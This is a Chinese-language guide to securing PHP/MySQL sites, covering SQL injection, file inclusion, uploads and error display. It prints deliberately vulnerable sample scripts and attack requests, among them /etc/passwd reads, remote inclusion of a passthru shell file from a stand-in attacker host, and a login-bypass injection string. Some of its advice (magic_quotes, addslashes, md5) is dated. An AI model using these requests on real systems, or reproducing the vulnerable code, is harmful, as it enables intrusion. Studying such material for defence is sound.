|
摘要:php+mysql注入的防范方法�����。
-對于像where id= ‘$id‘這樣的語句��,如果字段id是整數(shù)��,就一定要$id = intval($id);
-username = $username 這樣是錯誤的�,一定要加‘,正確寫法:username=‘$username‘
-用PHP的md5加密函數(shù)���,不用MYSQL的MD5函數(shù)
-如果是字符型的呢�?
我們可以先用addslashes()過濾一下��,然后再過濾”%”和”_”.
例如:
$search = addslashes($search);
$search = str_replace("_","\_",$search);
$search = str_replace("%","\%",$search);
記得�����,可千萬別在magic_quotes_gpc=On的情況下替換\為\\,如下:
$password=str_replace("\\","\\\\",$password);
-登陸的地方,如果是只用一個管理員管理的話���,我們可以直接對username和passwd用md5加密�,這樣就不用害怕注入技術(shù)的發(fā)展了�����。
Username=md5($HTTP_POST_VARS["username"]);
Passwd=md5($HTTP_POST_VARS["passwd"]);
- 包含文件
極易受攻擊的代碼片斷:
<?
//test_3.php
if(file_exists($filename))
include("$filename");
?>
這種不負(fù)責(zé)任的代碼會造成相當(dāng)大的危害��,攻擊者用如下請求可以得到/etc/passwd文件:
http://victim/test_3.php?filename=/etc/passwd
如果對于Unix版的PHP(Win版的PHP不支持遠程打開文件)攻擊者可以在自己開了http或ftp服務(wù)的機器上建立一個包含shell命令的文件�����,如http://attack/attack.txt的內(nèi)容是<?passthru("ls /etc")?>�����,那么如下的請求就可以在目標(biāo)主機執(zhí)行命令ls /etc:
http://victim/test_3.php?filename=http://attack/attack.txt
攻擊者甚至可以通過包含apache的日志文件access.log和error.log來得到執(zhí)行命令的代碼�,不過由于干擾信息太多���,有時不易成功����。
對于另外一種形式����,如下代碼片斷:
<?
//test_4.php
include("$lib/config.php");
?>
攻擊者可以在自己的主機建立一個包含執(zhí)行命令代碼的config.php文件����,然后用如下請求也可以在目標(biāo)主機執(zhí)行命令:
http://victim/test_4.php?lib=http://attack
PHP的包含函數(shù)有include(), include_once(), require(), require_once���。如果對包含文件名變量檢查不嚴(yán)就會對系統(tǒng)造成嚴(yán)重危險�,可以遠程執(zhí)行命令��。
解決方法:
要求程序員包含文件里的參數(shù)盡量不要使用變量����,如果使用變量,就一定要嚴(yán)格檢查要包含的文件名�,絕對不能由用戶任意指定。
如前面文件打開中限制PHP操作路徑是一個必要的選項����。另外,如非特殊需要����,一定要關(guān)閉PHP的遠程文件打開功能。修改php.ini文件:
allow_url_fopen = Off
重啟apache。
- 文件上傳
php的文件上傳機制是把用戶上傳的文件保存在php.ini的upload_tmp_dir定義的臨時目錄(默認(rèn)是系統(tǒng)的臨時目錄��,如:/tmp)里的一個類似phpxXuoXG的隨機臨時文件���,程序執(zhí)行結(jié)束����,該臨時文件也被刪除�����。PHP給上傳的文件定義了四個變量:(如form變量名是file��,而且register_globals打開)
$file #就是保存到服務(wù)器端的臨時文件(如/tmp/phpxXuoXG )
$file_size #上傳文件的大小
$file_name #上傳文件的原始名稱
$file_type #上傳文件的類型
推薦使用:
$HTTP_POST_FILES[‘file‘][‘tmp_name‘]
$HTTP_POST_FILES[‘file‘][‘size‘]
$HTTP_POST_FILES[‘file‘][‘name‘]
$HTTP_POST_FILES[‘file‘][‘type‘]
這是一個最簡單的文件上傳代碼:
<?
//test_5.php
if(isset($upload) && $file != "none") {
copy($file, "/usr/local/apache/htdocs/upload/".$file_name);
echo "文件".$file_name."上傳成功���!點擊<a href=\"$PHP_SELF\">繼續(xù)上傳</a>";
exit;
}
?>
<html>
<head>
<title>文件上傳</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<form enctype="multipart/form-data" method="post">
上傳文件:
<input type="file" name="file" size="30">
<input type="submit" name="upload" value="上傳">
</form>
</body>
</html>
這樣的上傳代碼存在讀取任意文件和執(zhí)行命令的重大問題。
下面的請求可以把/etc/passwd文檔拷貝到web目錄/usr/local/apache/htdocs/test(注意:這個目錄必須nobody可寫)下的attack.txt文件里:
http://victim/test_5.php?upload=1&file=/etc/passwd&file_name=attack.txt
然后可以用如下請求讀取口令文件:
http://victim/test/attack.txt
攻擊者可以把php文件拷貝成其它擴展名�����,泄漏腳本源代碼����。
攻擊者可以自定義form里file_name變量的值,上傳覆蓋任意有寫權(quán)限的文件。
攻擊者還可以上傳PHP腳本執(zhí)行主機的命令���。
解決方法:
PHP-4.0.3以后提供了is_uploaded_file和move_uploaded_file函數(shù)�����,可以檢查操作的文件是否是用戶上傳的文件�����,從而避免把系統(tǒng)文件拷貝到web目錄�����。
使用$HTTP_POST_FILES數(shù)組來讀取用戶上傳的文件變量�����。
嚴(yán)格檢查上傳變量�。比如不允許是php腳本文件����。
把PHP腳本操作限制在web目錄可以避免程序員使用copy函數(shù)把系統(tǒng)文件拷貝到web目錄。move_uploaded_file不受open_basedir的限制����,所以不必修改php.ini里upload_tmp_dir的值����。
把PHP腳本用phpencode進行加密��,避免由于copy操作泄漏源碼���。
嚴(yán)格配置文件和目錄的權(quán)限�����,只允許上傳的目錄能夠讓nobody用戶可寫�。
對于上傳目錄去掉PHP解釋功能���,可以通過修改httpd.conf實現(xiàn):
<Directory /usr/local/apache/htdocs/upload>
php_flag engine off
#如果是php3換成php3_engine off
</Directory>
重啟apache,upload目錄的php文件就不能被apache解釋了����,即使上傳了php文件也沒有問題,只能直接顯示源碼�����。
- sql_inject
如下的SQL語句如果未對變量進行處理就會存在問題:
select * from login where user=‘$user‘ and pass=‘$pass‘
攻擊者可以用戶名和口令都輸入1‘ or 1=‘1繞過驗證。
不過幸虧PHP有一個默認(rèn)的選項magic_quotes_gpc = On�����,該選項使得從GET, POST, COOKIE來的變量自動加了addslashes()操作�。上面SQL語句變成了:
select * from login where user=‘1\‘ or 1=\‘1‘ and pass=‘1\‘ or 1=\‘1‘
從而避免了此類sql_inject攻擊。
對于數(shù)字類型的字段�,很多程序員會這樣寫:
select * from test where id=$id
由于變量沒有用單引號擴起來,就會造成sql_inject攻擊�。幸虧MySQL功能簡單,沒有sqlserver等數(shù)據(jù)庫有執(zhí)行命令的SQL語句�����,而且PHP的mysql_query()函數(shù)也只允許執(zhí)行一條SQL語句�,所以用分號隔開多條SQL語句的攻擊也不能奏效。但是攻擊者起碼還可以讓查詢語句出錯����,泄漏系統(tǒng)的一些信息,或者一些意想不到的情況����。
解決方法:
要求程序員對所有用戶提交的要放到SQL語句的變量進行過濾。
即使是數(shù)字類型的字段�����,變量也要用單引號擴起來,MySQL自己會把字串處理成數(shù)字���。
在MySQL里不要給PHP程序高級別權(quán)限的用戶�����,只允許對自己的庫進行操作����,這也避免了程序出現(xiàn)問題被 SELECT INTO OUTFILE ... 這種攻擊�����。
- 警告及錯誤信息
PHP默認(rèn)顯示所有的警告及錯誤信息:
error_reporting = E_ALL & ~E_NOTICE
display_errors = On
在平時開發(fā)調(diào)試時這非常有用��,可以根據(jù)警告信息馬上找到程序錯誤所在�。
正式應(yīng)用時,警告及錯誤信息讓用戶不知所措�,而且給攻擊者泄漏了腳本所在的物理路徑���,為攻擊者的進一步攻擊提供了有利的信息��。而且由于自己沒有訪問到錯誤的地方�����,反而不能及時修改程序的錯誤�����。所以把PHP的所有警告及錯誤信息記錄到一個日志文件是非常明智的���,即不給攻擊者泄漏物理路徑��,又能讓自己知道程序錯誤所在�����。
修改php.ini中關(guān)于Error handling and logging部分內(nèi)容:
error_reporting = E_ALL
display_errors = Off
log_errors = On
error_log = /usr/local/apache/logs/php_error.log
然后重啟apache�,注意文件/usr/local/apache/logs/php_error.log必需可以讓nobody用戶可寫�����。
|
